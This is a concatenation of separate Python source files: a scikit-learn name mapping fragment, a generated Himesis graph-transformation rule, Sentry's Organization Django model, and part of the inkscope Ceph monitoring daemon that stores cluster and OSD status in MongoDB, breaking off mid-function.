"sklearn.covariance.oas": "oas-function",
"sklearn.decomposition.fastica": "fastica-function",
}
|
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HPos_ChildSchool_CompleteLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HPos_ChildSchool_CompleteLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HPos_ChildSchool_CompleteLHS, self).__init__(name='HPos_ChildSchool_CompleteLHS', num_nodes=0, edges=[])
# Set the graph attributes
self["mm__"] = []
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'Pos_ChildSchool')
# Nodes that represent match classes
# match class Child() node
self.add_node()
self.vs[0]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["MT_label__"] = """1"""
self.vs[0]["MT_dirty__"] = False
self.vs[0]["mm__"] = """MT_pre__Child"""
self.vs[0]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class School() node
self.add_node()
self.vs[1]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_label__"] = """2"""
self.vs[1]["MT_dirty__"] = False
self.vs[1]["mm__"] = """MT_pre__School"""
self.vs[1]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Service() node
self.add_node()
self.vs[2]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_label__"] = """3"""
self.vs[2]["MT_dirty__"] = False
self.vs[2]["mm__"] = """MT_pre__Service"""
self.vs[2]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
#Nodes that represent apply classes
# match class Person() node
self.add_node()
self.vs[3]["MT_subtypeMatching__"] = False
self.vs[3]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_label__"] = """4"""
self.vs[3]["MT_subtypes__"] = []
self.vs[3]["MT_dirty__"] = False
self.vs[3]["mm__"] = """MT_pre__Person"""
self.vs[3]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class SpecialFacility() node
self.add_node()
self.vs[4]["MT_subtypeMatching__"] = False
self.vs[4]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[4]["MT_label__"] = """5"""
self.vs[4]["MT_subtypes__"] = []
self.vs[4]["MT_dirty__"] = False
self.vs[4]["mm__"] = """MT_pre__SpecialFacility"""
self.vs[4]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# Nodes that represent the match associations of the property.
# match association Child--goesTo-->School node
self.add_node()
self.vs[5]["MT_subtypeMatching__"] = False
self.vs[5]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "goesTo"
"""
self.vs[5]["MT_label__"] = """6"""
self.vs[5]["MT_subtypes__"] = []
self.vs[5]["MT_dirty__"] = False
self.vs[5]["mm__"] = """MT_pre__directLink_S"""
self.vs[5]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc5')
# match association School--special-->Service node
self.add_node()
self.vs[6]["MT_subtypeMatching__"] = False
self.vs[6]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "special"
"""
self.vs[6]["MT_label__"] = """7"""
self.vs[6]["MT_subtypes__"] = []
self.vs[6]["MT_dirty__"] = False
self.vs[6]["mm__"] = """MT_pre__directLink_S"""
self.vs[6]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc6')
# Nodes that represent the apply associations of the property.
# apply association SpecialFacility--members-->Person node
self.add_node()
self.vs[7]["MT_subtypeMatching__"] = False
self.vs[7]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "members"
"""
self.vs[7]["MT_label__"] = """8"""
self.vs[7]["MT_subtypes__"] = []
self.vs[7]["MT_dirty__"] = False
self.vs[7]["mm__"] = """MT_pre__directLink_T"""
self.vs[7]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc7')
# Nodes that represent trace relations
# backward association Child---->Person node
self.add_node()
self.vs[8]["MT_subtypeMatching__"] = False
self.vs[8]["MT_label__"] = """9"""
self.vs[8]["MT_subtypes__"] = []
self.vs[8]["MT_dirty__"] = False
self.vs[8]["mm__"] = """MT_pre__trace_link"""
self.vs[8]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'blink8')
# backward association School---->SpecialFacility node
self.add_node()
self.vs[9]["MT_subtypeMatching__"] = False
self.vs[9]["MT_label__"] = """10"""
self.vs[9]["MT_subtypes__"] = []
self.vs[9]["MT_dirty__"] = False
self.vs[9]["mm__"] = """MT_pre__trace_link"""
self.vs[9]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'blink9')
# Add the edges
self.add_edges([
(3,8), # apply_class Person() -> backward_association
(8,0), # backward_association -> apply_class Child()
(4,9), # apply_class SpecialFacility() -> backward_association
(9,1), # backward_association -> apply_class School()
(4,7), # apply_class SpecialFacility() -> association members
(7,3), # association members -> apply_class Person()
(0,5), # match_class Child() -> association goesTo
(5,1), # association goesTo -> match_class School()
(1,6), # match_class School() -> association special
(6,2) # association special -> match_class Service()
])
# Add the attribute equations
self["equations"] = []
def eval_attr11(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr12(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr13(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr16(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "goesTo"
def eval_attr17(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "special"
def eval_attr14(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr15(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr18(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "members"
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
|
|
"""
sentry.models.organization
~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
from datetime import timedelta
from bitfield import BitField
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import IntegrityError, models, transaction
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from sentry import roles
from sentry.app import locks
from sentry.constants import RESERVED_ORGANIZATION_SLUGS
from sentry.db.models import (
BaseManager, BoundedPositiveIntegerField, Model, sane_repr
)
from sentry.db.models.utils import slugify_instance
from sentry.utils.http import absolute_uri
from sentry.utils.retries import TimedRetryPolicy
# TODO(dcramer): pull in enum library
class OrganizationStatus(object):
VISIBLE = 0
PENDING_DELETION = 1
DELETION_IN_PROGRESS = 2
class OrganizationManager(BaseManager):
# def get_by_natural_key(self, slug):
# return self.get(slug=slug)
def get_for_user(self, user, scope=None, only_visible=True):
"""
Returns a set of all organizations a user has access to.
"""
from sentry.models import OrganizationMember
if not user.is_authenticated():
return []
if settings.SENTRY_PUBLIC and scope is None:
if only_visible:
return list(self.filter(status=OrganizationStatus.VISIBLE))
else:
return list(self.filter())
qs = OrganizationMember.objects.filter(user=user).select_related('organization')
if only_visible:
qs = qs.filter(organization__status=OrganizationStatus.VISIBLE)
results = list(qs)
if scope is not None:
return [
r.organization for r in results
if scope in r.get_scopes()
]
return [r.organization for r in results]
class Organization(Model):
"""
An organization represents a group of individuals which maintain ownership of projects.
"""
__core__ = True
name = models.CharField(max_length=64)
slug = models.SlugField(unique=True)
status = BoundedPositiveIntegerField(choices=(
(OrganizationStatus.VISIBLE, _('Visible')),
(OrganizationStatus.PENDING_DELETION, _('Pending Deletion')),
(OrganizationStatus.DELETION_IN_PROGRESS, _('Deletion in Progress')),
), default=OrganizationStatus.VISIBLE)
date_added = models.DateTimeField(default=timezone.now)
members = models.ManyToManyField(settings.AUTH_USER_MODEL, through='sentry.OrganizationMember', related_name='org_memberships')
default_role = models.CharField(
choices=roles.get_choices(),
max_length=32,
default=roles.get_default().id,
)
flags = BitField(flags=(
('allow_joinleave', 'Allow members to join and leave teams without requiring approval.'),
('enhanced_privacy', 'Enable enhanced privacy controls to limit personally identifiable information (PII) as well as source code in things like notifications.'),
('disable_shared_issues', 'Disable sharing of limited details on issues to anonymous users.'),
('early_adopter', 'Enable early adopter status, gaining access to features prior to public release.'),
), default=1)
objects = OrganizationManager(cache_fields=(
'pk',
'slug',
))
class Meta:
app_label = 'sentry'
db_table = 'sentry_organization'
__repr__ = sane_repr('owner_id', 'name', 'slug')
@classmethod
def get_default(cls):
"""
Return the organization used in single organization mode.
"""
return cls.objects.filter(
status=OrganizationStatus.VISIBLE,
)[0]
def __unicode__(self):
return u'%s (%s)' % (self.name, self.slug)
def save(self, *args, **kwargs):
if not self.slug:
lock = locks.get('slug:organization', duration=5)
with TimedRetryPolicy(10)(lock.acquire):
slugify_instance(self, self.name,
reserved=RESERVED_ORGANIZATION_SLUGS)
super(Organization, self).save(*args, **kwargs)
else:
super(Organization, self).save(*args, **kwargs)
def delete(self):
if self.is_default:
raise Exception('You cannot delete the the default organization.')
return super(Organization, self).delete()
@cached_property
def is_default(self):
if not settings.SENTRY_SINGLE_ORGANIZATION:
return False
return self == type(self).get_default()
def has_access(self, user, access=None):
queryset = self.member_set.filter(user=user)
if access is not None:
queryset = queryset.filter(type__lte=access)
return queryset.exists()
def get_audit_log_data(self):
return {
'id': self.id,
'slug': self.slug,
'name': self.name,
'status': self.status,
'flags': self.flags,
'default_role': self.default_role,
}
def get_owners(self):
from sentry.models import User
return User.objects.filter(
sentry_orgmember_set__role=roles.get_top_dog().id,
sentry_orgmember_set__organization=self,
is_active=True,
)
def get_default_owner(self):
if not hasattr(self, '_default_owner'):
self._default_owner = self.get_owners()[0]
return self._default_owner
def has_single_owner(self):
from sentry.models import OrganizationMember
count = OrganizationMember.objects.filter(
organization=self,
role=roles.get_top_dog().id,
user__isnull=False,
user__is_active=True,
)[:2].count()
return count == 1
def merge_to(from_org, to_org):
from sentry.models import (
ApiKey, AuditLogEntry, Commit, OrganizationMember,
OrganizationMemberTeam, Project, Release, ReleaseCommit,
ReleaseEnvironment, ReleaseFile, ReleaseHeadCommit,
Repository, Team, Environment,
)
for from_member in OrganizationMember.objects.filter(organization=from_org, user__isnull=False):
try:
to_member = OrganizationMember.objects.get(
organization=to_org,
user=from_member.user,
)
except OrganizationMember.DoesNotExist:
from_member.update(organization=to_org)
to_member = from_member
else:
qs = OrganizationMemberTeam.objects.filter(
organizationmember=from_member,
is_active=True,
).select_related()
for omt in qs:
OrganizationMemberTeam.objects.create_or_update(
organizationmember=to_member,
team=omt.team,
defaults={
'is_active': True,
},
)
for team in Team.objects.filter(organization=from_org):
try:
with transaction.atomic():
team.update(organization=to_org)
except IntegrityError:
slugify_instance(team, team.name, organization=to_org)
team.update(
organization=to_org,
slug=team.slug,
)
for project in Project.objects.filter(organization=from_org):
try:
with transaction.atomic():
project.update(organization=to_org)
except IntegrityError:
slugify_instance(project, project.name, organization=to_org)
project.update(
organization=to_org,
slug=project.slug,
)
# TODO(jess): update this when adding unique constraint
# on version, organization for releases
for release in Release.objects.filter(organization=from_org):
try:
to_release = Release.objects.get(
version=release.version,
organization=to_org
)
except Release.DoesNotExist:
Release.objects.filter(
id=release.id
).update(organization=to_org)
else:
Release.merge(to_release, [release])
for model in (ApiKey, AuditLogEntry, ReleaseFile):
model.objects.filter(
organization=from_org,
).update(organization=to_org)
for model in (Commit, ReleaseCommit, ReleaseEnvironment,
ReleaseHeadCommit, Repository, Environment):
model.objects.filter(
organization_id=from_org.id,
).update(organization_id=to_org.id)
# TODO: Make these a mixin
def update_option(self, *args, **kwargs):
from sentry.models import OrganizationOption
return OrganizationOption.objects.set_value(self, *args, **kwargs)
def get_option(self, *args, **kwargs):
from sentry.models import OrganizationOption
return OrganizationOption.objects.get_value(self, *args, **kwargs)
def delete_option(self, *args, **kwargs):
from sentry.models import OrganizationOption
return OrganizationOption.objects.unset_value(self, *args, **kwargs)
def send_delete_confirmation(self, audit_log_entry, countdown):
from sentry import options
from sentry.utils.email import MessageBuilder
owners = self.get_owners()
context = {
'organization': self,
'audit_log_entry': audit_log_entry,
'eta': timezone.now() + timedelta(seconds=countdown),
'url': absolute_uri(reverse(
'sentry-restore-organization',
args=[self.slug],
)),
}
MessageBuilder(
subject='%sOrganization Queued for Deletion' % (options.get('mail.subject-prefix'),),
template='sentry/emails/org_delete_confirm.txt',
html_template='sentry/emails/org_delete_confirm.html',
type='org.confirm_delete',
context=context,
).send_async([o.email for o in owners])
|
|
#!/usr/bin/env python
#author Philippe Raipin
#author Eric Mourgaya
#licence : apache v2
# chkconfig: 2345 55 25
# description: Cephprobe daemon
#
# processname: cephprobe
# pidfile: /var/run/cephprobe/cephprobe.pid
### BEGIN INIT INFO
# Provides: cephprobe
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Start daemon at boot time
# Description: Enable service provided by daemon.
### END INIT INFO
from pymongo import MongoClient
from pymongo import MongoReplicaSetClient
from pymongo.read_preferences import ReadPreference
import time
# for ceph command call
import subprocess
import datetime
import sys
import traceback
import os
import re
import socket
from daemon import Daemon
import json
from StringIO import StringIO
from bson.dbref import DBRef
from threading import Thread, Event
import httplib
import signal
# from bson.objectid import ObjectId
# db.col.find({"_id": ObjectId(obj_id_to_find)})
configfile = "/opt/inkscope/etc/inkscope.conf"
runfile = "/var/run/cephprobe/cephprobe.pid"
logfile = "/var/log/inkscope/cephprobe.log"
clusterName = "ceph"
fsid = ""
ceph_version = ""
# load the conf (from json into file)
def load_conf():
datasource = open(configfile, "r")
data = json.load(datasource)
datasource.close()
return data
def get_ceph_version():
try:
args = ['ceph',
'--version']
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
return "not found"
ceph_version = re.search('[0-9]*\.[0-9]*\.[0-9]*', output)
if ceph_version:
return ceph_version.group(0)
return "not found"
except:
return '0.0.0 (could not be found on inkscope server - Please consider to install Ceph on it)'
# list sections prefixed
def ceph_conf_list(prefix):
p = subprocess.Popen(
args=[
'ceph-conf',
'-l',
prefix
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
outdata, errdata = p.communicate()
if (len(errdata)):
raise RuntimeError('unable to get conf option prefix %s: %s' % (prefix, errdata))
return outdata.rstrip().splitlines()
# get a field value from named section
def ceph_conf(field, name):
p = subprocess.Popen(
args=[
'ceph-conf',
'--show-config-value',
field,
'-n',
name,
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
outdata, errdata = p.communicate()
if len(errdata):
raise RuntimeError('unable to get conf option %s for %s: %s' % (field, name, errdata))
return outdata.rstrip()
# get a field value from global conf
def ceph_conf_global(field):
p = subprocess.Popen(
args=[
'ceph-conf',
'--show-config-value',
field
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
outdata, errdata = p.communicate()
if len(errdata):
raise RuntimeError('unable to get conf option %s: %s' % (field, errdata))
return outdata.rstrip()
# get a field value from global conf according to the specified ceph conf
def ceph_conf_global(cephConfPath, field):
p = subprocess.Popen(
args=[
'ceph-conf',
'-c',
cephConfPath,
'--show-config-value',
field
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
outdata, errdata = p.communicate()
if len(errdata):
raise RuntimeError('unable to get conf option %s: %s' % (field, errdata))
return outdata.rstrip()
# extract mons from conf and put them into mons
def process_conf(cephConfPath):
mon_sections=ceph_conf_list('mon.')
if len(mon_sections)==0:
initmon = ceph_conf_global(cephConfPath, 'mon_initial_members')
if not initmon:
raise RuntimeError('enable to find a mon')
mons = [initmon]
else:
mons = []
for mon in mon_sections:
mons.append(ceph_conf('host', mon))
# cluster
def init_cluster(restapi, ceph_rest_api_subfolder, db, hostname):
leader = leadership(db, hostname)
if isLeader or leader == None :
process_status(restapi, ceph_rest_api_subfolder, db)
process_crushmap(restapi, ceph_rest_api_subfolder, db)
process_osd_dump(restapi, ceph_rest_api_subfolder, db)
process_pg_dump(restapi, ceph_rest_api_subfolder, db)
process_df(restapi, ceph_rest_api_subfolder, db)
# health value
healthCst = ["HEALTH_OK", "HEALTH_WARN", "HEALTH_ERROR"]
healthMap = {}
for idx, h in enumerate(healthCst):
healthMap[h] = idx
def worst_health(h1, h2):
return healthCst[max(healthMap[h1], healthMap[h2])]
def leadership(db, hostname):
global isLeader
leaderfailed = False
cpleader = db.cephprobeleader.find_one()
if cpleader :
cp = db.cephprobe.find_one({"_id": cpleader["leader"]})
if cp["timestamp"] < int(round((time.time()- (hb_refresh*2))*1000)) :
#leader failed !!
leaderfailed = True
else :
isLeader = (cpleader["leader"] == hostname) #ensure leadership
return cpleader["leader"]
else :
leaderfailed = True
cpleader = {}
if leaderfailed :
isLeader = False
# I am the new leader ?
cephprobes = db.cephprobe.find( {"timestamp": {"$gt": int(round((time.time()- (hb_refresh*2)) * 1000))}})
if cephprobes :
cpids = [p["_id"] for p in cephprobes]
cpids.sort()
if cpids and (cpids[0] == hostname) :
# yes I am the new leader
print "I'm the leader, then I work"
sys.stdout.flush()
cpleader["leader"] = hostname
db.cephprobeleader.update({}, cpleader, upsert=True)
isLeader = True
return hostname
else :
# no one !!
return None
# uri : /api/v0.1/status.json
def process_status(restapi, ceph_rest_api_subfolder, db):
if not isLeader :
return
print str(datetime.datetime.now()), "-- Process Status"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder+"/api/v0.1/status.json")
r1=restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (Status) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(datetime.datetime.now()), "-- error (Status) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
return None
else:
data1 = r1.read()
restapi.close()
c_status = json.loads(data1)
monmap = c_status['output']['monmap']
map_stat_mon = {}
timecheckmap = {}
try:
time_checks = c_status['output']['health']['timechecks']
for tc in time_checks["mons"]:
tc["time_health"] = tc["health"]
del tc["health"]
monname = tc["name"]
del tc["name"]
timecheckmap[monname] = tc
except (RuntimeError, TypeError, NameError, KeyError):
pass
# complete timecheck
try:
health_services_list = c_status['output']['health']['health']['health_services']
for health_service in health_services_list:
health_services_mons = health_service['mons']
for monst in health_services_mons:
monstat = monst.copy()
monstat["mon"] = DBRef( "mon", monst['name'])
monstat["_id"] = monst['name']+":"+monst["last_updated"]
monstat["capacity_health"] = monstat["health"]
#complete with timecheck
if monstat["name"] in timecheckmap:
tc = timecheckmap[monstat["name"]]
monstat.update(tc)
monstat["health"] = worst_health(monstat["capacity_health"], monstat["time_health"])
del monstat["name"]
db.monstat.update({"_id" : monstat["_id"]}, monstat, upsert= True)
map_stat_mon[monst['name']] = monstat["_id"]
except (RuntimeError, TypeError, NameError, KeyError):
pass
map_rk_name = {}
for mon in monmap['mons']:
#find the mon host
hostaddr = mon['addr'].partition(':')[0]
monhostid = None
#if hostaddr == '': # the case if mon is declared but not completly configured
# no need to treat cause we can keep monhostid = None
if hostaddr != '':
# first lookup known hosts in db
monhost = db.hosts.find_one({"hostip": hostaddr})
if not monhost:
monneti = db.net.find_one({"$where": "this.inet.addr === '"+hostaddr+"'"})
if monneti:
monhostid = monneti["_id"].partition(":")[0]
else: # not found in db, lookup with fqdn
monhostid = socket.getfqdn(hostaddr)
else:
monhostid = monhost["_id"]
mondb = {"_id": mon['name'],
"host": DBRef( "hosts", monhostid),
"addr": mon['addr'],
"rank": mon['rank'],
}
if mon['name'] in map_stat_mon :
mondb["stat"] = DBRef("monstat", map_stat_mon[mon['name']])
db.mon.update({"_id": mon['name']}, mondb, upsert=True)
map_rk_name[mon['rank']] = mon['name']
# no skew and latency ?
mm = {"epoch": monmap['epoch'],
"created": monmap['created'],
"modified": monmap['modified'],
"mons": [DBRef( "mon", m['name']) for m in monmap['mons']],
"quorum": [DBRef( "mon", map_rk_name[rk]) for rk in c_status['output']['quorum']]
}
cluster = {"_id": c_status['output']['fsid'],
"election_epoch": c_status['output']['election_epoch'],
"monmap": mm,
"pgmap": c_status['output']['pgmap'],
"osdmap-info": c_status['output']['osdmap']['osdmap'],
"name": clusterName
}
try:
cluster.health = c_status['output']['health']['overall_status']
cluster.health_detail = c_status['output']['health']['detail']
cluster.health_summary = c_status['output']['health']['summary']
except Exception, e:
pass
db.cluster.update({'_id': c_status['output']['fsid']}, cluster, upsert=True)
return c_status['output']['fsid']
# uri : /api/v0.1/osd/df.json
def process_osd_df(restapi, ceph_rest_api_subfolder, db):
if not isLeader :
return
print str(datetime.datetime.now()), "-- Process OSDDF"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder+"/api/v0.1/osd/df.json")
r1=restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (OSDDF) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(datetime.datetime.now()), "-- error (OSDDF) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
else:
data1 = r1.read()
restapi.close()
osd_in_db = db.osd.find({"or" : [{"lost": {'$exists' : False}}, {"lost": False}]}, fields = {"_id" : 1})
lost_osd = list(osd_in_db)
osd_df = json.loads(data1)
osds = osd_df['output']['nodes']
for osd in osds:
osd_df = {"osd": DBRef("osd", osd["id"]),
"timestamp": int(round(time.time() * 1000)),
"kb": osd["kb"],
"type_id": osd["type_id"],
"reweight": osd["reweight"],
"crush_weight": osd["crush_weight"],
"utilization": osd["utilization"],
"depth": osd["depth"],
"kb_avail": osd["kb_avail"],
"pgs": osd["pgs"],
"kb_used": osd["kb_used"],
"device_class": osd["device_class"],
"var": osd["var"],
"type": osd["type"]
}
osd_df_id = db.osddf.insert(osd_df)
try: # try to update already existing osd
osddb = db.osd.find({"_id": osd["id"]}).next()
osddb["df"]= DBRef( "osddf", osd_df_id)
db.osd.update({'_id': osddb["_id"]}, osddb, upsert=True)
except:
pass
# uri : /api/v0.1/osd/dump.json
def process_osd_dump(restapi, ceph_rest_api_subfolder, db):
if not isLeader:
return
print str(datetime.datetime.now()), "-- Process OSDDump"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder + "/api/v0.1/osd/dump.json")
r1 = restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (OSDDump) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(
datetime.datetime.now()), "-- error (OSDDump) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
else:
data1 = r1.read()
restapi.close()
osd_in_db = db.osd.find({"or": [{"lost": {'$exists': False}}, {"lost": False}]}, fields={"_id": 1})
lost_osd = list(osd_in_db)
osd_dump = json.loads(data1)
osdsxinfo_map = {}
for xi in osd_dump['output']['osd_xinfo']:
osdsxinfo_map[xi["osd"]] = xi
osds = osd_dump['output']['osds']
for osd in osds:
if osd["osd"] in lost_osd:
lost_osd.remove(osd["osd"])
osd_stat = {"osd": DBRef("osd", osd["osd"]),
"timestamp": int(round(time.time() * 1000)),
"weight": osd["weight"],
"up": osd["up"] == 1,
"in": osd["in"] == 1,
"last_clean_begin": osd["last_clean_begin"],
"last_clean_end": osd["last_clean_end"],
"up_from": osd["up_from"],
"up_thru": osd["up_thru"],
"down_at": osd["down_at"],
"lost_at": osd["lost_at"],
"state": osd["state"]
}
osd_stat_id = db.osdstat.insert(osd_stat)
hostaddr = osd["public_addr"].partition(':')[0]
osdhostid = None
# find host name
# if hostaddr == '': # the case if osd is declared but not completly configured
# no need to treat cause we can keep osdhostid = None
if hostaddr != '':
# first lookup known hosts in db
osdhost = db.hosts.find_one({"hostip": hostaddr})
if not osdhost:
osdneti = db.net.find_one(
{"$where": "this.inet != null && this.inet.addr === '" + hostaddr + "'"})
if osdneti:
osdhostid = osdneti["_id"].partition(":")[0]
else: # not found in db, lookup with fqdn
osdhostid = socket.getfqdn(hostaddr)
else:
osdhostid = osdhost["_id"]
osddatapartitionid = None
if osdhostid:
osddatapartition = db.partitions.find_one({"_id": {'$regex': osdhostid + ":.*"},
"mountpoint": '/var/lib/ceph/osd/' + clusterName + '-' + str(
osd["osd"])})
if osddatapartition:
osddatapartitionid = osddatapartition['_id']
osddb = {"_id": osd["osd"],
"uuid": osd["uuid"],
"node": DBRef("nodes", osd["osd"]),
"stat": DBRef("osdstat", osd_stat_id),
"public_addr": osd["public_addr"],
"cluster_addr": osd["cluster_addr"],
"heartbeat_back_addr": osd["heartbeat_back_addr"],
"heartbeat_front_addr": osd["heartbeat_front_addr"],
"down_stamp": osdsxinfo_map[osd["osd"]]["down_stamp"],
"laggy_probability": osdsxinfo_map[osd["osd"]]["laggy_probability"],
"laggy_interval": osdsxinfo_map[osd["osd"]]["laggy_interval"],
"host": DBRef("hosts", osdhostid),
"partition": DBRef("partitions", osddatapartitionid)
}
try:
osdori = db.osd.find({"_id": osd["osd"]}).next()
